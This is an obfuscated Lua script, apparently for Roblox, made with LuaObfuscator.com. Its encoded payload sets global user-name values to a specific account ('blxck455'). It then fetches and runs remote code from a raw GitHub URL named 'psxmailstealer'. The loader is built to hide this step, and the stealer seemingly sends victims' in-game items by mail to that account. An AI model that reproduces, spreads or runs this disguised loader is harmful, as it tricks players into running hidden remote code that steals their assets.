--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v71=v2(v0(v30,16));if v19 then local v80=0;local v81;while true do if (v80==0) then v81=v5(v71,v19);v19=nil;v80=1;end if (v80==1) then return v81;end end else return v71;end end end);local function v20(v31,v32,v33)if v33 then local v72=(v31/((9 -7)^(v32-(1 -0))))%((1816 -(609 + 1205))^(((v33-(2 -1)) -(v32-1)) + (2 -1))) ;return v72-(v72%(1929 -(1610 + 318))) ;else local v73=0 -0 ;local v74;while true do if ((1813 -((390 -(27 + 242)) + (1818 -(93 + 33))))==v73) then v74=2^(v32-(1849 -(208 + 1640))) ;return (((v31%(v74 + v74))>=v74) and (1 + 0)) or ((3108 -1113) -(310 + 1685)) ;end end end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(1127 -((153 -79) + 1053))) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1 -0 ;end if (v34==1) then return v35;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==(1780 -(627 + 1152))) then return (v38 * (1093 -837)) + v37 ;end if (v36==(1557 -(441 + 1116))) then v37,v38=v1(v16,v18,v18 + (5 -3) );v18=v18 + (5 -3) ;v36=(1222 + 267) -(888 + 466 + 134) ;end end end local function v23()local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if ((1433 -(259 + 1173))==v39) then return (v43 * (2216520 + 14560696)) + (v42 * (15566 + 49970)) + (v41 * (1274 -(53 + (2620 -(1454 + 201))))) + v40 ;end if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + (423 -(37 + 383)) );v18=v18 + ((940 -(105 + 608)) -(81 + 142)) ;v39=2 -1 ;end end end local function v24()local v44=v23();local v45=v23();local v46=1 + 0 ;local v47=(v20(v45,528 -(424 + 103) ,71 -51 ) * ((3 -1)^(1550 -(1307 + 211)))) + v44 ;local v48=v20(v45,21,1658 -(659 + 968) );local v49=((v20(v45,347 -(108 + 207) )==1) and  -(188 -(143 + 44))) or (1 + 0) ;if (v48==((1558 -(1529 + 29)) + 0 + 0)) then if (v47==0) then return v49 * (0 -0) ;else v48=1;v46=0 -0 ;end elseif (v48==(5800 -3753)) then return ((v47==(0 + 0)) and (v49 * ((1300 -(317 + 982))/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(718 + 261 + 44) ) * (v46 + (v47/(((108 -(69 + 34)) -3)^(1939 -(44 + 1843))))) ;end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(3 -2) );v18=v18 + v50 ;local v52={};for v69=3 -2 , #v51 do v52[v69]=v2(v1(v3(v51,v69,v69)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(1 + 0)) then v56=nil;v57=nil;v53=2;end if (v53==(3 + 1)) then while true do if (v54~=(0 -0)) then else local v97=0 + 0 ;while true do if (v97~=(0 -0)) then else local v111=272 -(219 + 53) ;while true do if (v111~=0) then else v55=1937 -(1489 + 448) ;v56=nil;v111=443 -(377 + 65) ;end if (1~=v111) then else v97=1 + 0 ;break;end end end if (v97==(103 -(85 + 17))) then v54=1 -0 ;break;end end end if (v54~=(4 -2)) then else v59=nil;v60=nil;v54=1289 -(206 + 1080) ;end if (v54==(2 -1)) then local v98=469 -(118 + 351) ;while true do if (1~=v98) then else v54=1972 -(340 + 1630) ;break;end if (v98~=(366 -(320 + 46))) then else v57=nil;v58=nil;v98=1;end end end if ((1 + 2)~=v54) then else v61=nil;while true do local v105=0 + 0 ;local v106;while true do if (v105==(0 -0)) then v106=0;while true do if (v106~=(336 -(269 + 67))) then else local v112=0;while true do if (v112==(3 -2)) then v106=1440 -(945 + 494) ;break;end if (v112==(0 + 0)) then if (v55~=1) then else local v119=1427 -(724 + 703) ;local v120;local v121;while true do if ((1514 -(1299 + 214))~=v119) then else while true do if (v120~=0) then else v121=0 + 0 ;while true do if (v121~=(1 + 0)) then else v61={};v55=4 -2 ;break;end if (v121==(0 + 0)) then v59={v56,v57,nil,v58};v60=v23();v121=1 -0 ;end end break;end end break;end if (0~=v119) then else v120=0 -0 ;v121=nil;v119=2 -1 ;end end end if ((1446 -(238 + 1205))~=v55) then else local v122=0;local v123;local v124;while true do if (v122~=(0 -0)) then else v123=1851 -(1052 + 799) ;v124=nil;v122=1954 -(518 + 1435) ;end if (v122~=(1 + 0)) then else while true do if (v123~=0) then else v124=0 + 0 ;while true do if (1~=v124) then else return v59;end if (v124==(0 + 0)) then local v160=0 + 0 ;while true do if (v160==(1 + 0)) then v124=1 -0 ;break;end if (v160~=0) then else for v173=1 -0 ,v23() do v57[v173-1 ]=v28();end for v175=943 -(684 + 258) ,v23() do v58[v175]=v23();end v160=2 -1 ;end end end end break;end end break;end end end v112=2 -1 ;end end end if ((2 -1)==v106) then if (v55~=(1 + 1)) then else local v113=0;local v114;local v115;while true do if (v113==(0 -0)) then v114=1853 -(408 + 1445) ;v115=nil;v113=1;end if (v113~=1) then else while true do if ((1315 -(880 + 435))==v114) then v115=1043 -(70 + 973) ;while true do if (v115~=(2 -1)) then else for v154=1372 -(978 + 393) ,v23() do local v155=0;local v156;local v157;while true do if (v155~=(0 + 0)) then else v156=0;v157=nil;v155=1 + 0 ;end if (v155~=1) then else while true do if ((1743 -(209 + 1534))==v156) then v157=v21();if (v20(v157,1,1757 -(654 + 1102) )==(0 -0)) then local v185=0;local v186;local v187;local v188;local v189;while true do if (v185==(0 -0)) then v186=0 -0 ;v187=nil;v185=967 -(279 + 687) ;end if (v185==(2 -1)) then v188=nil;v189=nil;v185=1 + 1 ;end if (v185~=(2 + 0)) then else while true do if (v186~=(116 -(57 + 58))) then else local v198=0 -0 ;while true do if (v198~=(1307 -(1235 + 71))) then else v186=2;break;end if (v198~=(1306 -(843 + 463))) then else v189={v22(),v22(),nil,nil};if (v187==0) then local v206=0 -0 ;local v207;while true do if ((0 + 0)==v206) then v207=0 -0 ;while true do if (v207==(1329 -(906 + 423))) then v189[5 -2 ]=v22();v189[2 + 2 ]=v22();break;end end break;end end elseif (v187==(689 -(39 + 649))) then v189[4 -1 ]=v23();elseif (v187==(412 -(21 + 389))) then v189[1 + 2 ]=v23() -((2 + 0)^(53 -37)) ;elseif (v187~=(2 + 1)) then else local v216=0 + 0 ;local v217;while true do if (v216~=(0 + 0)) then else v217=0 -0 ;while true do if (v217==0) then v189[3]=v23() -((2 + 0)^(439 -(251 + 172))) ;v189[4]=v22();break;end end break;end end end v198=878 -(860 + 17) ;end end end if (v186==3) then if (v20(v188,1 + 2 ,1159 -(406 + 750) )~=(20 -(13 + 6))) then else v189[4]=v61[v189[12 -8 ]];end v56[v154]=v189;break;end if (v186~=2) then else local v200=0;while true do if (v200~=(1 + 0)) then else v186=3;break;end if (v200==(0 + 0)) then if (v20(v188,1,117 -(75 + 41) )~=1) then else v189[970 -(211 + 757) ]=v61[v189[1 + 1 ]];end if (v20(v188,2,2)~=1) then else v189[377 -(196 + 178) ]=v61[v189[1 + 2 ]];end v200=1;end end end if ((672 -(346 + 326))~=v186) then else local v201=0 + 0 ;local v202;while true do if (v201==(0 -0)) then v202=0 + 0 ;while true do if ((212 -(31 + 180))~=v202) then else v186=3 -2 ;break;end if (v202==(0 -0)) then v187=v20(v157,2,143 -(7 + 133) );v188=v20(v157,4,1038 -(940 + 92) );v202=1;end end break;end end end end break;end end end break;end end break;end end end v55=3;break;end if (v115~=(0 -0)) then else local v152=109 -(64 + 45) ;while true do if (v152~=(3 -2)) then else v115=1 + 0 ;break;end if (v152~=(447 -(27 + 420))) then else for v167=1 + 0 ,v60 do local v168=0 -0 ;local v169;local v170;while true do if (v168~=0) then else local v177=0;while true do if ((1597 -(341 + 1256))==v177) then v169=v21();v170=nil;v177=1;end if (v177==(2 -1)) then v168=1;break;end end end if (v168==(1 -0)) then if (v169==(1 + 0)) then v170=v21()~=(356 -(247 + 109)) ;elseif (v169==(2 + 0)) then v170=v24();elseif (v169~=(5 -2)) then else v170=v25();end v61[v167]=v170;break;end end end v59[7 -4 ]=v21();v152=773 -(564 + 208) ;end end end end break;end end break;end end end if ((0 + 0)==v55) then local v116=0;local v117;while true do if (v116==0) then v117=751 -(708 + 43) ;while true do if (v117==0) then local v126=0;while true do if (v126==(0 -0)) then local v153=0 + 0 ;while true do if (v153~=(966 -(672 + 293))) then else v126=1;break;end if (v153~=(153 -(107 + 46))) then else v56={};v57={};v153=1 + 0 ;end end end if (v126==1) then v117=1265 -(86 + 1178) ;break;end end end if (v117~=1) then else v58={};v55=1 + 0 ;break;end end break;end end end break;end end break;end end end break;end end break;end if (v53~=(7 -5)) then else local v75=0 + 0 ;while true do if (v75==(0 + 0)) then v58=nil;v59=nil;v75=1;end if (v75==(1 + 0)) then v53=3;break;end end end if (v53~=3) then else local v76=0 + 0 ;while true do if (v76~=0) then else v60=nil;v61=nil;v76=1;end if ((1168 -(204 + 963))==v76) then v53=4;break;end end end if (v53~=(0 + 0)) then else v54=0;v55=nil;v53=1 -0 ;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (1==v65) then v68=v62[3];return function(...)local v82=1;local v83= -1;local v84={...};local v85=v12("#",...) -1 ;local function v86()local v87=v66;local v88=v67;local v89=v68;local v90=v27;local v91={};local v92={};local v93={};for v99=0,v85 do if ((v99>=v89) or ((3082 -(1258 + 560))==3970)) then v91[v99-v89 ]=v84[v99 + (1446 -(390 + 1055)) ];else v93[v99]=v84[v99 + 1 + 0 + 0 ];end end local v94=(v85-v89) + 1 + 0 ;local v95;local v96;while true do local v100=383 -(267 + 116) ;local v101;local v102;while true do if (((2016 + 1898)<4898) and (v100==1)) then while true do if (((524 + 189)<=4959) and (((466 + 1362) -(1342 + 486))==v101)) then v102=0 + 0 ;while true do if (((2814 -(686 + 643))>(540 + 59)) and (v102==(3 -2))) then if ((v96<=(577 -(89 + 483))) or ((8470 -5512)<1515)) then if (((2587 -(48 + 1032))<=(5440 -(1126 + 197))) and (v96<=(2 + (391 -(325 + 66))))) then if (((1958 -1065)>(2478 -(22 + 1835))) and (v96<=0)) then v93[v95[1478 -(849 + 627) ]]=v64[v95[4 -1 ]];elseif ((v96==(73 -(69 + 3))) or ((402 + 1402)>=(1152 + 1672))) then v93[v95[(2 + 0) -0 ]]();elseif ((1911<=2436) and (v93[v95[(926 -(46 + 876)) -2 ]]==v95[4])) then v82=v82 + 1 ;else v82=v95[3];end elseif ((v96<=(8 -5)) or ((3073 -(169 + 676))>=2410)) then v93[v95[2 + 0 ]]=v95[9 -6 ]~=(0 -0) ;elseif ((4291==(4384 -(88 + 5))) and (v96==(199 -(158 + 37)))) then v82=v95[732 -(247 + 482) ];else local v137=0;local v138;local v139;local v140;local v141;local v142;local v143;while true do if ((v137==(1080 -(790 + 287))) or (((4967 -(502 + 54)) -(11 + 15 + 445))<=(3529 + 113))) then while true do if ((v138==(1 -0)) or (2855>=(13189 -9189))) then v141=nil;v142=nil;v138=2;end if (((267 + (2169 -(159 + 340)))==((10441 -6916) -((2153 -884) + 319))) and (v138==(1874 -(1502 + 370)))) then v143=nil;while true do if ((v139==(197 -(7 + 190))) or ((904 -251)>=(1016 + 167))) then local v179=1195 -((1956 -1346) + 585) ;local v180;while true do if ((v179==(0 + 0)) or ((4564 -(541 + 44))<(254 + 368))) then v180=659 -(444 + 215) ;while true do if (((3146 -(88 + (1376 -581)))>27) and (v180==(0 -0))) then local v197=0 + 0 ;while true do if (((3422 -(1609 + 56))<3176) and (v197==(4 -3))) then v180=(5 -3) -1 ;break;end if ((v197==(1232 -(586 + 646))) or ((532 + (4687 -1490))<=(2918 -(79 + 164)))) then v140=v95[(6 -4) + 0 ];v141,v142=v90(v93[v140](v13(v93,v140 + 1 ,v95[1499 -(121 + 1375) ])));v197=1 + 0 ;end end end if ((v180==(1 + 0)) or ((4464 -(282 + 328 + 180))<(575 + 1567))) then v139=1713 -(27 + 1685) ;break;end end break;end end end if ((v139==(4 -3)) or (4845<(3655 -(141 + 1601)))) then local v181=0 -0 ;local v182;while true do if ((v181==(0 + 0 + 0)) or ((8122 -5108)<=(57 + 182))) then v182=0 -0 ;while true do if ((v182==(1633 -(20 + 1612))) or ((412 + 763)>=(2048 + 425))) then v139=1 + 1 ;break;end if (((0 -0)==v182) or ((2627 + 2066)<(2248 -(1349 + (178 -112))))) then v83=(v142 + v140) -(1997 -(1175 + (2050 -(1047 + 182)))) ;v143=575 -(185 + 390) ;v182=1314 -((2154 -1006) + 165) ;end end break;end end end if ((v139==(2 + 0)) or (2073<(816 -(285 + 24)))) then for v190=v140,v83 do local v191=0;while true do if (((3315 -2291)<(4517 -(607 + 1014))) and (0==v191)) then v143=v143 + (2 -1) ;v93[v190]=v141[v143];break;end end end break;end end break;end if (((1335 + 2871)==4206) and (v138==(1081 -(583 + 498)))) then local v171=0;while true do if (((8081 -5209)>=514) and (v171==(0 + 0))) then v139=0 + 0 ;v140=nil;v171=1 -0 ;end if (((441 + 1089 + 804)>(4307 -3050)) and (v171==1)) then v138=1 + 0 ;break;end end end end break;end if (((2100 -(512 + 1273))<(2515 -(367 + 33))) and (v137==2)) then v142=nil;v143=nil;v137=3;end if (((873 + 1130)>1671) and (v137==(135 -(45 + 90)))) then v138=0 -0 ;v139=nil;v137=140 -(4 + 135) ;end if (((1968 -(1167 + 223))<=2811) and (v137==(2 -1))) then v140=nil;v141=nil;v137=247 -(229 + 16) ;end end end elseif ((v96<=(1255 -(825 + 422))) or ((1215 -523)>(87 + 3094))) then if ((v96<=(1510 -(834 + 670))) or ((19053 -14536)<(4553 -2079))) then do return;end elseif ((v96==(17 -10)) or ((3548 -(262 + 1207))==75)) then v93[v95[1 + 1 ]]=v95[1 + (5 -3) ];else v93[v95[2 + 0 ]][v95[2 + 0 + 1 ]]=v95[6 -(6 -4) ];end elseif ((v96<=(25 -16)) or ((14221 -10201)<((1092 -(239 + 797)) -40))) then local v130=504 -((1761 -(1002 + 293)) + 38) ;local v131;local v132;local v133;while true do if (((6 + 180)<(5746 -(354 + 564))) and (v130==(1 + 0))) then v133=nil;while true do if (((6996 -3429)==(9045 -5478)) and (v131==(992 -(732 + 259)))) then v93[v132 + (3 -2) ]=v133;v93[v132]=v133[v95[4 + 0 ]];break;end if ((0==v131) or ((1613 -400)>=(3525 -(125 + 1250)))) then local v165=0;local v166;while true do if (((1615 + 2109)>((1107 -(724 + 58)) + 1396)) and (v165==(0 -0))) then v166=0 + 0 ;while true do if (((1 + 0 + 0)==v166) or ((3915 -(1844 -877))==((29877 -14807) -(11372 -(27 + 314))))) then v131=1 + 0 ;break;end if (((9611 -6027)==(7589 -4005)) and (v166==(0 + 0))) then local v192=0 + 0 ;while true do if (((11380 -8842)<(5137 -2269)) and (v192==(0 -0))) then v132=v95[938 -(188 + 748) ];v133=v93[v95[3]];v192=1566 -(735 + 830) ;end if ((v192==(1 + 0)) or (2024>4569)) then v166=1 + 0 ;break;end end end end break;end end end end break;end if (((1125 -(884 + (580 -358)))==(13 + 6)) and (v130==(0 + 0))) then v131=0 -0 ;v132=nil;v130=335 -(103 + 231) ;end end elseif (((2688 -(471 + 327))<=(4640 -((1914 -1115) + 255 + 269))) and (v96==((14 -6) + 2))) then local v148=0 + 0 ;local v149;local v150;local v151;while true do if ((((15365 -6834) -(5113 -(242 + 141)))>=(3548 -(54 + 316))) and (v148==(1236 -(709 + 526)))) then v151=nil;while true do if ((3746>(2067 + 1397)) and (v149==(0 -0))) then local v172=1483 -(667 + 816) ;while true do if ((v172==(675 -(274 + 400))) or ((3382 -2025)<=(2152 -(750 + 1063)))) then v149=523 -(57 + 465) ;break;end if ((v172==(0 -0)) or ((5652 -(1449 + 81))<(4394 -1691))) then v150=0;v151=nil;v172=1;end end end if ((v149==(1 + 0)) or ((1571 + 241)==4068)) then while true do if (((2862 -(975 + 864))>=((2073 + 927) -2205)) and (v150==0)) then v151=v95[2];v93[v151]=v93[v151](v13(v93,v151 + (4 -(8 -5)) ,v83));break;end end break;end end break;end if (((10314 -6915)==(3595 -(177 + 19))) and (v148==(0 -0))) then v149=(2333 -(1013 + 16)) -((1813 -1243) + 734) ;v150=nil;v148=1;end end elseif ((v95[5 -3 ]==v93[v95[4]]) or (1440<=(419 -(1236 -(435 + 660))))) then v82=v82 + (1 -0) ;else v82=v95[1868 -(716 + 1149) ];end v82=v82 + (1649 -(1513 + 135)) ;break;end if ((3368>=(2318 -(95 + 81))) and (v102==(1436 -(193 + 1243)))) then local v118=490 -(293 + 10 + 187) ;while true do if (((1517 -872)>=(257 -147)) and ((2 -1)==v118)) then v102=1 + (0 -0) ;break;end if (((3535 + 283)>=2774) and (v118==((0 -0) -0))) then local v125=191 -(112 + 79) ;while true do if (((5100 -(17 + 0 + 321 + 585))>=(692 + 1932)) and (v125==1)) then v118=1;break;end if (((4025 -1965)==((1957 -(643 + 1109)) + 1855)) and (v125==(0 -0))) then v95=v87[v82];v96=v95[1160 -(1084 + 75) ];v125=4 -3 ;end end end end end end break;end end break;end if ((0==v100) or ((11676 -7648)<=(12856 -9574))) then v101=0 + 0 ;v102=nil;v100=1 + 0 ;end end end end A,B=v27(v11(v86));if  not A[1] then local v103=0;local v104;while true do if (0==v103) then v104=v62[4][v82] or "?" ;error("Script error at ["   .. v104   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O0003023O005F4703083O00557365724E616D6503083O00626C78636B342O3503093O00557365724E616D6532026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F70737873637269707465726D616E2F7073786861636B2F6D61696E2F7073786D61696C737465616C657200153O0012073O00013O0026023O000800010001002O043O0008000100122O000100023O00300800010003000400122O000100023O0030080001000500040012073O00063O000E0B0006000100013O002O043O0001000100122O000100073O00122O000200083O0020090002000200090012070004000A4O0003000500014O0005000200054O000A00013O00022O0001000100010001002O043O00140001002O043O000100012O00063O00017O00153O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
